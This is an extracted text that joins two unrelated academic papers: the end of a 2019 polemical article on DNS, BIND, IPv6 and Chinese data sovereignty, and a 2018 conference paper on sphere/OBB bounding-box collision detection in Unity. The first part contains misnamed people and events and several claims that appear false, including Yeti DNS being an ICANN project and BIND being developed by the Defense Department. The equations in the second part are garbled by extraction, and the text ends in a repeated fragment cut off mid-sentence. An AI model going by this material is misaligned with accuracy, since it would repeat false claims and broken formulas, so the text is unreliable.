Tor the onion router to highlight the hosted mainframe will definitely increase risk of severe data leaking. According to the news released by the Ministry of Public Security of China on January 25, there are 406 million passengers during the National Railway Spring Festival in 2019, which far exceeds the US population (326 million). The amount of data and information is considerable, and the value of open source intelligence is difficult to assess. If the United States and Taiwan use this path to launch a network attack or hacker intrusion, it will be able to accurately locate and track any target, and the consequences are unimaginable. Important note: IANA was formerly managed by the National Telecommunications and Information Administration (NTIA) of the US Department of Commerce. The establishment of ICANN is to fulfill the duties of the IANA. The functions of the two are different and mutually reinforcing, and must be implemented in accordance with the no-cost agreement signed with the Ministry of Commerce and they work well with each other. IANA's functions are developed as part of the ARPANET’s deployment of the US department of advanced defense research projects agency, including: 1) coordinating the allocation of Internet Protocol’s technical parameters; 2) fulfilling duties related to Internet DNS root zone management; 3) Assign an Internet IP address. IV. THE IMPORTANT INSPIRATION PROVIDED BY “DNS IMPLEMENTATION DAY” A. The Bankruptcy of the “Snowman Plan” Lie The “Snowman Plan” proposed and announced by ICANN in 2015, its English name is “the Yeti DNS Project”, i.e. the “Snowman DNS Plan”. ICANN's best-known responsibilities and missions are to coordinate the global Internet's unique identifier system as a technical coordinator for the Internet Domain Name System (DNS) to ensure the stable and secure operation of the unique identifier system. The "Snowman DNS Program" website hosted by ICANN clearly states that the "Snowman DNS" system is a test platform for root domain name services and some experiments and will do not add/delete delegates in the IANA root zone, and all resource records (Resets) are identified by the "Yeti” security extensions (DNSSEC) key, no alternate domain space is provided. Paul Dixie, proclaimed himself as the “father of domain names”, one of the founders of the Snowman DNS Program, stressed and warned in 2016 that if the “Snowman Plan” is considered to be a domain name expansion, anyone in addition to IANA will be able to effectively edit the top-level domain space, such as adding a new top-level domain (TLD) or changing the ownership of an existing top-level domain (TLD). The International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 40 answer is definitely not; if you touch it (to instead the root domain name service), you will die; and if a certain country wants to create its own Internet DNS system, independence will be unhealthy, vulgar and short-lived. Paul's "Snowman DNS" working mode: Figure 1. Snowman DNS working mode For a long time some professionals and government officials in China spare no effort to advocate that the “Snowman Plan” is led by Chin, represented by Beijing Tinder Interconnect Information Technology Co. Ltd. (BII Group), and claimed that China had “Built a global IPv6 root server network and demonstrating a new IPv6 root server capabilities”, “China deployed four IPv6-based root servers, breaking the predicament of China with no root servers in the past.” and the like. Ruthlessly, the "DNS Execution Day" returned the "Snowman Plan" back to reality. The result of DNS’s compliance announced the impeachment of the “Snowman Plan” in the beginning of the Internet’s “the next 30 years of the DNS era"; or it was a “slapstick” exploited by someone. The practice makes “alternative routes for the domain name” unsustainable, as well as the melting of invest and foundation of the “snowman” (deceitful publicity and fake amounts) which lasts for more than three years. Beijing Tandy Interconnect Information Technology Co. Ltd. (BII Group)’s IPV6 domain name server compliance testing result IPv6 address: 240c:f:6644:2:0:276a:c70 Test result: Fatal error detected dns=timeout edns=timeout edns1=timeout edns@512=timeout ednsopt=timeout edns1opt=timeout do=timeout ednsflags=timeout docookie=timeout edns512tcp=timeout Optlist=timeout A l l 1 1 t e s t s a r e o u t o f o r d e r Figure 2. Result of IPV6 DNS Compliance Testing It is worth pondering that the DNS Extension Mechanism (EDNS) was proposed by Paul in 1999 (RFC 2671) and became a standard in 2013 (RFC 6891). However, Paul turned a blind eye to “snowman” deceitful technology, its non-compliant application and self-deprecating in the Internet community (that is, the flexible workaround of the claimed “one world, one Internet, one domain name system”). So where does the reason lie? Is Paul fooling the experts of the BII Group or vice versa? Or is there a tacit agreement between the two? The above facts also clearly reveal that the Internet vitality based on IPv4 technology is still vigorous. For the United States, the “DNS era of the next 30 years” is still the IPV4 era. According to the “USG v6 status statistics” collected by the National Institute of Standards and Technology (NIST) until December 22, 2018, only 2% of the US-supported IPv6 industries are still in operation in spite of the US government's nearly 20-year IPv6 transition plan,98% of them have transitions or no progress; only 3% of US universities use IPv6 domain name operations, 97% of them have International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 41 transitions or no progress, which is an abnormal dynamic that cannot be ignored. According to the APNIC statistics, until October 31, 2018, the rate of US IPv6 users has dropped from the first to the third worldwide, and China ranked 71st. According to Google's monitoring, the adoption rate of IPv6 in the United States is actually a mere 36.31%. The Asia Pacific Network Information Center (APNIC) report pointed out that from the second half of 2017 to August 2018, the IPv6 deployment status had declined. Operators who are under higher pressure of an IPv4 addresses shortage have a low IPv6 deployment rate, which does mean that there is no urgency to deploy IPv6 in a client/server (C/S) environment in many areas of the Internet. In other words, the pressure of address shortage is not a sufficient and necessary prerequisite for deploying IPv6 on a large scale. Entrusted by the Office of the Chief Technology Officer (OCTO) of the Internet Corporation for Assigned Names and Numbers (ICANN), the Internet Governance Projects Group (IGP) of the Institute of Public Policy at the Georgia Institute of Technology published a survey report entitled “latent standard war” in February 2019, the research analysis found that it’s not a “transition” issue that makes sense between IPv4 and IPv6, but economic disputes between the two routes in technological evolution; and the current lopsided IPv6 deployment rate and the relevant data violates a simple or predictable pattern. According to “Supporting China's IPv6 Scale Deployment - China's IPv6 Service End-to-End User Experience Monitoring Report” released by China's “National Next Generation Internet Industry Technology Innovation Strategic Alliance” on November 1, 2018, there are 7.18 million IPv6 Active Users (IPv6 Allocated and with IPv6 Internet history records within one year) with mobile broadband and 2.33 million with fixed broadband, 9.51 million in total. According to the “promoting the scale of IPv6deployment” requirements to reach a 200 million at the end of 2018, the current number is still far behind. IPv6 subverts the situation of IPv4 network application architecture, and it is difficult to solve a large number of known and unknown security traps and security barriers.: huge investment and operation and maintenance costs, and the economic benefit in the future is distant no matter whether it is market economy or planned economy; the balance of trade-offs. It is imperative to re-adjust the strategy of deploying IPv6 in a realistic manner. Our country must make an early decision. In the face of well-known and irrefutable facts, what will the Beijing Tandy Interconnect Information Technology Co. Ltd. (BII Group)’s experts say? Self-defense or explanation? Should the administrative, law enforcement, auditing, and supervision departments of the state and governments at all levels seriously perform their duties? B. BIND is the Key and Crucial Part The US Defense Advanced Research Projects Agency (DARPA) funded the development of BIND in 1980 and BIND, which was taken over by the US Internet Systems Alliance (ISC) after 1984, is the most important core step and strategic deployment of the Internet. It is for not only the "kidnapping" of the DNS hub platform, but also for the close integration in the "soft and hard" aspects, firmly grasping and controlling the ownership, command, control and decision-making power of the DNS. BIND has embedded in the DNS and has become the “de facto standard” for DNS bundled applications. The global software market, which dominates DNS applications, is not only a “traffic light” rule that guides the flow of Internet data, but also a baton that conducts compulsory obedience if you have “bad Behavior”; you will be in violation of the law, get lost, embarrassed, and chaotic or hit the wall. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 42 Figure 3. Structure of BIND The picture above shows that under the role of BIND (control command guiding software interconnection and interoperability), the DNS application drives the recursive server, the recursive domain name server and the domain name resolution system perform conduct three irreversible domain name resolution iterations by "right to left" interaction process. However, any of these links may be eavesdropped, stolen, tampered with or transferred. It may also be a "safe information exchange" after being "legally mirrored" by the hierarchical service providers. It is “sifter-type” vulnerability that professionals must have knowledge of it. The US Department of Defense uses the domain name system to set the Internet logical boundary, and the US Department of Defense Network Information Center (DOD Network Information Center) operates and manages the military-specific network NIPR net. BIND (developed by the US Department of Defense), which is solidified in DNS, was targeted to the data flow to the US Department of Defense Network Information Center firstly and then to other network information center nodes such as intelligence departments. We must pay attention that the process DNS request data (and information) is identical during the parsing interaction. Some experts explained that: “The content stored in the root server is very few. Usually, ordinary users will not access the root server when they surf the internet.” If it is not an ignorant mistake, it must be intentionally misleading. Given the information on May 12, 2017, when the “WandaCry” ransom ware incident spread rapidly in International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 43 more than 150 countries and regions around the world. A British engineer stumbled upon the "want to cry" virus through domain name to conduct command and control (C&C), and used the "Kill Switch" method to effectively curb the “WandaCry” virus, which was praised by the industry and the media as an “Accidental Hero”. At the same time, the world has realized the BIND solidified” end switch” function of the DNS. “Termination switch” is a new Internet term or a network hot word involving data sovereignty, network security, and Internet governance. The exact definition of Internet Kills which is: a control mechanism designed to be activated as a countermeasure to shut down all or part of the Internet traffic. US Senator Joe Lieberman and other people submitted a legislative proposal “Protecting Cyberspace as a Nationalization Act Asset Act of 2010)” (S. 3480) at the 111th Congress on June 19, 2010, was called by the media as the Internet Termination Switch Act. The Electronic Privacy Information Center (EPIC) of the American Civil Human Rights Organization began to track the US government's Standard Operating Procedure 303 secret plan document in 2011. The 30-page “Emergency Radio Protocols” drafted by the National Telecommunications Coordination Center (NCC) and approved by the National Communications System (NCS), proposes the process to “close and restore commercial and private wireless network when the country is in crisis.” It represents the policy of the US government and is also called the "Internet Kill Switch" by the industry and the media. ICANN's official website published a passage entitled “What is the Internet termination switch? Who has the key?”On July 22, 2016, clarifying that the Internet "termination switch" is in the domain name root zone and ICANN holds the key. Russian experts call it the “red button of the Internet.” Europe, Russia and other countries have been highly vigilant against the US control and command to solidify BIND's DNS. The NSD developed by NLnet Lab in the Netherlands based on BIND standards. Although the technology research and the support are relatively independent, it has not yet to form a mainstream. But at least, from the perspective of DNS application, it is possible to avoid “all eggs in one basket” and reduce risks; and from the perspective of open cooperation, research and development of controllable technologies and products can lead to the balance of different companies and seek a balances; in the long run, it is beneficial to the Internet domain “building” to balance of DNS control. Russia recently announced that it will take the test out of the global Internet in the near future (April 1). The focus and purpose is to check the content blocked by the traffic, to ensure that the traffic between Russian users (more than 90%) remains in the country, and it can only be the necessary countermeasures about research and development to control parallel DNS. Our country should catch up. While drawing on and utilizing BIND in the United States and NSD in Europe, we can encourage the reference to the boundary and frontier security defense measures of the "Einstein 3" plan, and cut into the situational awareness based on real-time monitoring of DNS open source data information to accumulate experience, and re-recognize and explore the source of governance and control of the Internet, strive to develop the DNS system software that is self-controllable and compatible (check and balance) for both BIND and NSD. C. Data Sovereignty and Security are the Key Point In summary, Data Sovereignty has become the consensus and action of the United States, the European Union, and many countries (including the legislation and governance), especially after the “Prism Gate”, it becomes the important “topflight” Without the principle of data sovereignty, not only is data International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 44 security and privacy at risk, but national data assets are inevitably threatened. In particular, it should be pointed out that the “interconnection” of the Internet today is conditional and bordered! For example, China's IP address is used as a “blacklist” by some professional websites outside the country, and the access to it is prohibited (404, no access authorization). The general identification of data sovereignty is: the government’s control over the collection of data in the country, including data residency (the location where data is forced to store), data retention (the compulsory reservation of data trade records). The United States is the initiator of the Internet. At first, it was introduced from the military APA network to the European Internet in order to transmit open source data (information, intelligence). For more than half a century, the United States has built and developed the Internet; the technological innovation is always about data sovereignty, data security and data utilization (acquiring intelligence)--all for data. Even from this perspective, we must re-recognize and deepen our understanding of the relationship between United States and the Internet, the world and the Internet, China and the Internet in all ways. We are obviously seriously lagging behind when we continue to follow the understanding, and thinking of the Internet 20 or 30 years ago in the United States and the situation even becomes more and more serious, ruthlessly ignoring our innovation and entrepreneurship in cyberspace, making us just wait and see again and again. Being completely marginalized, the scientific advancement of the future network is gradually drifting away. Today, any network technology carries data. Network applications generate data; interconnections exchange data; network services face data; network innovation development (such as artificial intelligence) relies on data; network security (national security) protects data, Data has been integrated into the driving force of human social development, building the collective assets, culture and language of the community. Data, whether territorial or affiliated, has been transformed and applied in different degrees and at different levels “genetically modified”. The “face-changing” of data has become the norm and has become a subversive factor for maintaining or shaking the fundamentals of cyberspace sovereignty and security. Most Chinese citizens and officials are not sensitive enough to network data. They know nothing about cloud computing, big data, small probability events, open source information, and always think that there is no bearing between themselves and the unit, not to mention the full use of data, the urgent need to build and develop data centers, and the great importance of it. The DBS Group study believes that the overall utilization rate of China's data centers is less than 50%, and the utilization rate of data centers in the lower cities is only a 20%. In the next 3-5 years, the demand for data centers will not be transferred to the data centers of the lower rate cities on a large scale. Because of this, Amazon, Apple, Microsoft, IBM, etc. have come to China to build data centers in the past few years, called China services, which are actually American services. Ten cent, Net Ease, Baidu, 360, Railway 12306 and even party and government agencies have also been “managed” to overseas hosting servers in exchange for “free” advanced technology services and individual business interests in China. DNS-based CDN (and SDN) technology has formed the mainstream and technology trends of the Internet for years to come. In most network environments of national key information infrastructure, gatekeepers, firewalls, intrusion detection systems, anti-virus software are usually configured to control the data traffic of TCP/IP and other network protocols, and to implement the physical isolation (PNI) between internal networks (private networks) and public Internet. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 45 However, the rather universal stipulation and phenomenon deviate from the facts. Cyber security threat exploits this cognitive misunderstanding and the blind spot of supervision, DNS is used as a carrier to bypass the network security protection mechanism and transmit sensitive data from inside the enterprise to the outside of the enterprise. Even the ""physically isolated” private network still relies on DNS requests and responses to form an interaction between internal and external network (connection de facto). Usually it is “unblocked” (such as firewall port 53) and the commonly-held blind area (such as DNS abuse, misuse), so that the abnormal behavior of intranet DNS applications and information leakage through DNS is basically out of control. Figure 4. DNS as a Covert Channel Within Protected Networks In the diagram above of the US Department of Energy (DOE), the “channels” of (1)-(2)-(3) are inherent to the industry intranet and industry extranets, that is, part of the network system; (a)-(b) “channel” is caused by DNS abuse or the existence of a loophole in the target terminal, that is, the application of chaos out of control (such as random use of Google public DNS service, 8.8.8.8, etc.); (4)-(5) forms the hidden channel of DNS that can be used not only as a transmission carrier for leaking data, but also as a means of command and control (C2) (such as APT). Johnson from US Secretary of Homeland Security reported in January 2016 that the Einstein Plan for the National Cyber Security System (NCPS) began in 2010 and entered the third phase (called E3A) in April 2013. It not only monitors cyber attacks, but also has the ability to intercept and handle the confidential information; it can also effectively protect the government network’s security and respond to the most advanced network attack opponents. Simultaneously E3A provides a platform for new technology research and development, and cooperates with advanced technology and expertise of government departments and private industries to discover unknown network attacks. The US Congress has mandated that all federal International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 46 administrations join the E3A program by the end of 2016. "Einstein-3" (E3A) provides four main functions: 1) defense: real-time mitigation of already known or suspected cyber security threats; 2) screening: identification of invaded information systems, system components or host terminals, as an immediate response to security incidents; 3) perception: customized development, maintenance, and service for the network security status of the federal government information system, based on “Security is Normal Monitoring”. 4) Discovery: monitoring and identifying new or emerging cyber security threats targeting federal government information systems to enhance cyber security defenses. It is recommended that the state should formulate and launch China's network sovereignty and security strategic plan based on "Einstein-3" (E3A), using the existing network infrastructure to build an autonomous and controllable DNS situational awareness system, and build China's data sovereignty, data security, and data utilized for the new cyberspace Great Wall. V. CONCLUSION Today's Internet is facing a number of major changes. All countries are trying to grasp the latest technology for this revolution. As the United States announces the abandonment of the “next-generation Internet IPNG”, it marks the entrance to a new era for the Internet. Based on the current status of worldwide Internet domain name system research, this paper analyzes the international research level of this technology, discusses Internet security and data security problems we are now facing, and puts forward the importance of independent research and development of Internet domain name system. At present, most of the servers in China are still hosted in foreign countries, which pose considerable, latent danger to data security. Under the current environment of Internet innovation, it is necessary to grasp the immediate opportunities and conduct research and development of the Internet domain name system to ensure China's data sovereignty and information security, and keep pace with the Internet development era. VI. ACKNOWLEDGEMENT This passage is written by the Director of International Strategic Research Center of China Mobile Communication Federation; the Chairman of Nanjing Huadao Network Technology Co. Ltd. work_7vrukcafpzgrvmhu5m3pbiimbe ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 84 Research on Bounding Volume Boxes Collision Detection Algorithm in Virtual Reality Technology Wan Chao School of Computer Science and Engineering Xi’an Technological University Xi'an of Shaanxi Province, China e-mail: 958088613@qq.com Liu Pingping, Hong Bo School of Computer Science and Engineering Xi’an Technological University Xi'an of Shaanxi Province, China e-mail: 1341369601@qq.com Abstract—This paper take the development of virtual campus roaming system as an example. Aiming at the defects of the different kinds of bounding boxes collision detection technology, analyzes the advantages of the hybrid hierarchical bounding box collision detection algorithm based on spheres and oriented bounding box, and described the way to construct it. Finally, the algorithm is tested in the VC and Unity3d engine, a good result is obtained. Keywords-VR Technology; Bounding Volume Boxes; Collision Detection; Unity3d I. INTRODUCTION Virtual reality (VR) is a comprehensive technology integrating computer graphics, multimedia technology and many other technologies. Its purpose is to simulate the scene in reality. As an open platform, it has three characteristics: interactivity, conceptualization, and immersion [1]. In order to ensure the sense of the environment, the objects in the scene must have the corresponding physical properties. At the same time, the user will not penetrate the object in various operations, and can truly feel the occurrence of a collision. So collision detection technology has a very important position in the VR technology [2]. Collision detection technology is developing continuously, and some classic collision detection algorithms are widely used. Such as AABB (Aligned Axis Bounding Box), Spheres, OBB (Oriented Bounding Box), etc. these methods are applicable to objects with different geometric features, so their simplicity of detection is not ideal. Some scholars have proposed a hybrid bounding box algorithm for the reason. An algorithm similar to OBB-Spheres is formed. In continuous collision detection, some scholars proposed a subspace based algorithm, which effectively improved the speed and accuracy of continuous collision detection. II. BASIC PRINCIPLE OF COLLISION DETECTION The construction of virtual campus roaming system uses collision detection technology, real-time rendering technology, environment modeling technology, etc. The collision detection technology ensures the true sense of the whole system, and constitutes the basis of the user experience, which gives the user a sense of immersion in the virtual scene. Collision detection technology is to increase the impact body on the object in the scene, increase the sense of authenticity, prevents the appearance of the characters through the wall. The overlap of a part of a person and the object in a scene are obviously incompatible with the logic in real life [3]. The basic principles can be defined as follows: In a virtual three-dimensional space with n objects. Its three-dimensional geometric coordinate system and time variable constitute a four dimensional coordinate system, which is represented as wC . The path formed by the motion of the i -th object constitutes a subset of wC . It marked as iC ( ni 1 ). Collision detection is to determine whether the 1i -th object intersects the 2i -th object, That is to determine whether 21 ii CC  is empty. For the detection of object collision, Unity provides a good test platform that you can create two virtual geometries in it, give them a collision device, and then detect the collision effect between them. It is also possible to create two empty objects, add two specific colliders to them, test the collisions between different colliders directly, In addition you can create an object and a ray of light that simulates the impact of light cast on an object. These correspond to the three kinds of collision detection strategy in Unity, they called basic collision detection, trigger collision detection, light projection [4]. III. HYBRID HIERARCHICAL BOUNDING BOX BASED ON SURROUNDING AND DIRECTED BOUNDING BOXES A. Bounding Box Technology There are many kinds of bounding boxes. Some classical methods include Spheres, AABB (Aligned Axis Bounding Box), OBB (Oriented Bounding Box), etc [5]. This is the main introduction to Spheres and OBB. 1) Spheres: Bounding sphere (Spheres) is a relatively simple but poor tightness bounding box. It will produce too much redundant space for more concave objects as an outer sphere of the geometric object. So there is a phenomenon that the collision occurs when the collision is not touched and the ball is encircled. In order to illustrate the construction process, it is assumed that the geometric object is E, The representation of all the most basic geometric elements (such as triangles and circles) in the object with SE. The calculation method of the encircling ball is simpler than that of the other bounding boxes: The average value of three sets 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 85 of coordinates all the elements in the SE (triangle angle bisector intersection coordinate, circle center coordinates value) is centre of Bounding sphere, denoted by C (x, y, z). Then compare the distance between center and each basic geometric element in the object E, maximum value is that the radius of the bounding sphere, denoted by R. Thus, the parameter required to record a ball is much less than that of the other encircling boxes， Coordinates a sphere just to give the center (3 parameters) and the radius (1 Parameters). The intersecting test method between the bounding balls is relatively simple. It is only necessary to compare the distance between the two spheres and the sum of their radius. The specific methods are as follows: Assuming the center and the radius of the two surrounding spheres are s1(x1, y1, z1), R1 and s2( x2, y2, z2), R2. If 21 2 21 RRss  , Then two bounding balls intersected, otherwise, two bounding balls are not intersected. The detailed expression of this inequality is:        221221221221 RRzzyyxx  (1) As the sphere rotates in that direction, the parameters that express its attributes will not change, So no matter the surrounding geometric objects rotates any angles, it will not run out of the ball. Therefore, when a fixed shape object moves, the encircling ball need not recalculate the radius, but only need to translate the center coordinates accordingly. But you need to recalculation the center and the radius of the object ball for a shape changing object. Therefore, the real- time and continuity of the encircling ball collision detection algorithm is poor. 2) OBB(Oriented Bounding Box): It is a minimum rectangular body that contains a geometric object and has any direction in a coordinate system. How to find the best direction of the long cube when constructing OBB and determine the minimum number of reachable length and width is the key to the construction. Compared with the encircling ball, the construction of OBB seems very difficult, and the concrete construction method of OBB is as follows: Given a geometric object, in order to distinguish the E mentioned earlier, here is G. Similarly, the SG is used to represent the set of all the most basic geometric elements in the object, such as the triangle and the circle. For the sake of simplicity, all the basic elements of the object are assumed to be triangles, It is set to have n triangles in which the three vertices of the i-th (i >0) triangle are recorded as ai, bi, and ci, The values of the mean of the set SG(denoted by μ) and the evaluation method of covariance C are as follows (ai, bi, ci are all one-dimensional vectors):     n i iii cba n 13 1  (2)   3,1, 3 1 1    kjccbbaa n C n i i k i j i k i j i k i jjk (3) In which the μ is a one - dimensional vector, Cjk is a value, and the symmetric matrix composed of the matrix element Cjk is recorded as C. The obtained matrix C is a real symmetric matrix and has three different eigenvalues. Therefore, the eigenvectors corresponding to the three eigenvalues are orthogonal to each other. The unit processing of the three eigenvectors obtained is also given a set of base, The group also forms the three axis of the OBB, so that the best direction of the OBB is determined. The rest is to determine the minimum length and width of the OBB. To find the three smallest numbers, we only need to map the vertices of each basic geometric element in SG on the three axis of the axis just obtained. The minimum value on each axis is the required length and width. According to the description of the above construction method, we can know that the structure of OBB is very complicated, The description of a OBB is also very troublesome, with more parameters needed. A total of 15 numbers need to be described, of which 9 numbers are used to describe three axes, each axis is represented by one dimension vector consisting of three parameters. The remaining 6 numbers represent the length and the corresponding axis of OBB length and width. The OBB constructed by the above method has high tightness due to its arbitrariness of the substrate, and it can follow the shape change of the object to make the change of the direction length quickly and do not need to recalculate. B. Model Constructing The three-dimensional modeling of the virtual campus is the three-dimensional modeling of the terrain, roads, buildings, plants and other objects around the campus. The main work of 3D modeling is to collect, collate, classify and pretreat the basic geographic information for the objects that need to be modeled. The underlying technologies involved are polygonal modeling and texture mapping [6]. In the traditional 3D scene building method, various objects in the scene have various geometric representation methods because of their different shapes and precision requirements, the most used model at present are Surface model and polygon mesh model. In the campus roaming system, the polygon mesh model is often used because the objects in the scene are mostly edges and corners. Polygonal models form the shape of the models from the most basic points and lines, then give the corresponding material to the surface of the object, and add the illumination model to increase the reality of the object. Texture mapping technology is used for material additions, a two-dimensional image that represents the surface texture of an object is mapped to the surface of a three-dimensional object. The basic idea is to map the coordinates of the texture patterns to the geometric coordinates of the vertices of the 3D models in a certain way, and then map the points on the geometric 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 86 objects onto the screen, and finally display them. As shown in Figure 1. Figure 1. Texture Map. C. Construction of Hierarchical Encircling Box Tree The roaming system is a continuous cycle process that draws every frame that is displayed to the user through logical judgment, As shown in Figure 2. In order to improve the speed and real-time performance of collision detection, the traditional bounding box collision detection algorithm can not get the desired result, and the hybrid bounding box algorithm solves this problem [7]. Figure 2. System Running Process A hierarchical encircling box tree is a tree structure composed of tree nodes composed of encircling boxes. According to the previous introduction, the OBB bounding box algorithm has a better compact type, and the speed is faster when the object is displaced or rotated, But the intersecting test is difficult, and the speed is slow. While the encircling ball algorithm is poor in tightness, but the intersection test is simple and fast, and it has faster update speed than the OBB algorithm. In combination with the advantages of the two algorithms, these two algorithms are selected here. The bounding ball algorithm can be used as the root node of the bounding box tree because of the simple speed of intersecting test. It can be used to eliminate a large number of disjoint objects which are easily judged. There are two main methods used to construct encircling box trees. One bottom-up way is to form a basic geometric element of an object as a leaf node, then recursively, and gradually form the final root node, another is the top - down method, which is completely the opposite, it recursive partition from the root node, and finally to the leaf node. A top-down method is used to construct a hierarchical encircling box tree here because of the maturity of the current construction technology and the breadth of use, as shown in Figure 3. Figure 3. The Top-down Bounding Box Tree . It is considered whether it is built dynamically or in a static way when building a bounding box tree [8]. When the static structure is built, it is necessary to rebuild the bounding box tree once the shape changes or moves. Otherwise, when the dynamic structure is used, it does not need to be rebuilt with the change of the object. Although the dynamic structure is better than the static structure, it needs to modify the node data in real time, and the stability is weak. The real-time performance of the update is difficult to solve. We use the static structure with high stability to build the bounding box tree because the objects in the virtual campus roaming system are mostly static objects, they will not change when they collide. IV. SYSTEM APPLICATION AND TEST RESULTS In order to verify that the algorithm can realize the collision detection between different geometric features well, the initial test is carried out. A teapot and a cylinder are used for a collision test. The teapot is made up of 8680 triangles and 17500 vertices, and the cylinder is made up of 8064 triangles and 16256 vertices. Its complexity can meet the test Start Initialization Loading scene Mouse/Keyboard Input? Esc? End Execution logic Picture update Output buffer Draw to the screen Memory Monitor No Yes No Yes Texture Map Geometry Screen MappingMapping 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 87 requirements. A double encircling box is constructed on the vertex of two objects surrounded by two forked trees. The outer layer of the node constructs the encircling ball, and the inner layer of the node constructs the OBB and the sphere bounding box respectively. Compare it with the collision detection algorithm based on the OBB bounding box, RAPID. According to the evaluation function of collision detection algorithm: uuppvv CNCNCNT  (4) The algorithm and the RAPID algorithm are compared and analyzed. On the premise of obtaining the same and correct detection results, the experiment compares the collision detection time between the two algorithms in the same collision scene. According to the collision detection evaluation function, when the two algorithms are used for collision detection, the number of basic geometric primitives pairs involved (Np) is the same, and the cost of a pair of geometric primitives (Cp) is the same. The same scene is used in the contrast experiment. The motion track of the object is the same. The number of nodes needed to be updated by the two algorithms after the motion of the object is the same as the number of Nu. This algorithm updates the cost of a double bounding box (Cu), which is the cost of updating an inner bounding box. Therefore, the total cost of the two algorithms (T) is related to the cost Nv*Cv of the bounding box overlap test and the cost Cu of updating a bounding box. The algorithm constructs sphere and OBB for the inner layer of the two forked tree node of the teapot and the cylinder. The intersecting test of sphere and OBB is similar to the OBB algorithm, but the test is more rapid and simple, at most only three times. The sphere bounding box is less expensive to update than OBB, so the algorithm is less expensive to update a bounding box than the RAPID algorithm. The experimental results of the two algorithms are shown in Table 1, and the efficiency comparison of the algorithm is shown in Figure 4. TABLE I. TABLE COLLISION DETECTION TIME COMPARISON Overlap number This paper’s algorithm time- consuming/ms RAPID algorithm time-consuming/ms efficiency lifting multiple 31 6.73 13.13 1.95096 142 8.29 19.25 2.32207 238 9.59 23.02 2.40042 347 11.21 23.89 2.13113 429 12.19 28.86 2.36751 666 14.66 32.45 2.21351 815 18.87 45.78 2.42607 961 19.56 48.89 2.49949 1081 22.89 54.21 2.36828 1295 25.96 62.03 2.38945 C o ll is io n d e te c ti o n t im e/ m s Triangle overlap number 200 400 600 800 1000 1200 1400 1600 10 20 30 40 50 60 70 80 This paper’s algorithm RAPID algorithm Figure 4. Time contrast diagram of algorithm collision detection The experimental results show that when the number of triangle overlaps is the same, the algorithm reduces the collision detection time and the collision response between objects faster than the RAPID algorithm. it improved the reality of the scene when the object collides in real time. With all kinds of collision bounding box collision detection algorithm is developed based on the Unity3d engine development, software developers only need to add different colliders to objects can complete the corresponding collision detection test algorithm, without the need to write the corresponding collision detection algorithm, which effectively improves the efficiency of software development 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 88 [9]. In Unity, there are mainly static colliders such as Box Collider, Sphere Collider, Capsule Collider, Wheel Collider, and rigid body colliders for dynamic objects. In this system, a rigid body collider is added to the roaming role, and various static colliders are added to the objects, such as buildings, flowers and trees, and the ground. The information processing of collision is realized through collision occurrence, collision vanishing and collision maintaining function in script [10], and a function of pop-up GUI interface is added to trigger the specific GUI interface in collision occurrence function. This algorithm can also test the collision function of the system through the Game interface in Unity. When a character collides with a building, the script will trigger a collision event due to adding a collision body to a specific building attachment. Then a pop-up information window will be introduced to the corresponding building, and the result is shown in Figure 5. Figure 5. The information window displayed after the collision We can know that the mixed level bounding box collision detection algorithm based on encircling ball and OBB bounding box has also achieved very good results in developing the system. It not only enhances the reality of the scene, but also completes the trigger of the window pop- up event through the detection of collision events, which enhances the interactivity and makes the system more humanized. V. CONCLUSION This paper studies virtual campus roaming system based on Virtual Reality Technology, Through the whole development process of the system, the implementation principle of the collision detection technology and the hybrid bounding box algorithm based on the encircling ball and the directed bounding box are emphasized. ACKNOWLEDGMENT Fund support: Shaanxi Education Department Special Fund Project number: Shaanxi Education Finance (GSYSJ20170009). REFERENCES [1] Tang Cui-Fang, Design and Implementation of Campus Roaming System Based on Virtual Reality Technology [J], Science and Technology Innovation Herald, 2016, 20, 87-88. [2] Han Lei, Research on Virtual Building Roaming and Collision Detection Based on Unity3D [J], Academic Exchange, 2016, 19, 194- 195+197. [3] Wang Yu, Research and Application of Collision Detection in Virtual Roaming System [J], Electronic Design Engineering, 2016, 13, 155– 156+160. [4] Wang Feng-Qin, Research on Virtual Training System of Rock Drilling Platform Based on Unity3D [D], Shijiazhuang Tiedao University, Shijazhuang, 2016. [5] Li Zhen, Research on Optimization Algorithm for Rigid Body Collision Detection in Virtual Scene [D], Jilin Agricultural University, Changchun, 2016. [6] Wang Shuang, Cheng Yong-Dang, Kong Fan-Jin, and Yang Bin, A Survey of Virtual Reality [J], Science & Technology Vision, 2016, 11, 129+153. [7] Zhang Shao-Bo, Research on Key Technology of Human-computer Interaction in Immersive Virtual Reality [D], Chongqing University of Posts and Telecommunications, Chongqi, 2016. [8] Zhang Jia-Jia, Optimization Simulation of Collision Detection in 3D Virtual Environment [J], Computer Simulation, 2016, 03, 359-362. [9] Lai Quan, Cha Mu-Ga, Jineerdemutu, and Jinhugejiletu, Development and Research of 3D Visualized Campus System Based on Unity3D Platform [J], Sci-Tech Information Development & Economy, 2016, 01, 124-127. [10] Wang Lei, The Research of Collision Detection Technology Based on Hybrid Bounding Box and Its Application in Web3D Roaming [D]. Shanghai University, Shanghai, 2015. I. Introduction II. Basic Principle of Collision Detection III. Hybrid Hierarchical Bounding Box Based on Surrounding and Directed Bounding Boxes A. Bounding Box Technology 1) Spheres: Bounding sphere (Spheres) is a relatively simple but poor tightness bounding box. It will produce too much redundant space for more concave objects as an outer sphere of the geometric object. So there is a phenomenon that the collision occurs when the collision is not touched and the ball is encircled. In order to illustrate the construction process, it is assumed that the geometric object is E, The representation of all the most basic geometric elements (such as triangles and circles) in the object with SE. The calculation method of the encircling ball is simpler than that of the other bounding boxes: The average value of three sets of coordinates all the elements in the SE (triangle angle bisector intersection coordinate, circle center coordinates value) is centre of Bounding sphere, denoted by C (x, y, z). Then compare the distance between center and each basic geometric element in the object E, maximum value is that the radius of the bounding sphere, denoted by R. Thus, the parameter required to record a ball is much less than that of the other encircling boxes， Coordinates a sphere just to give the center 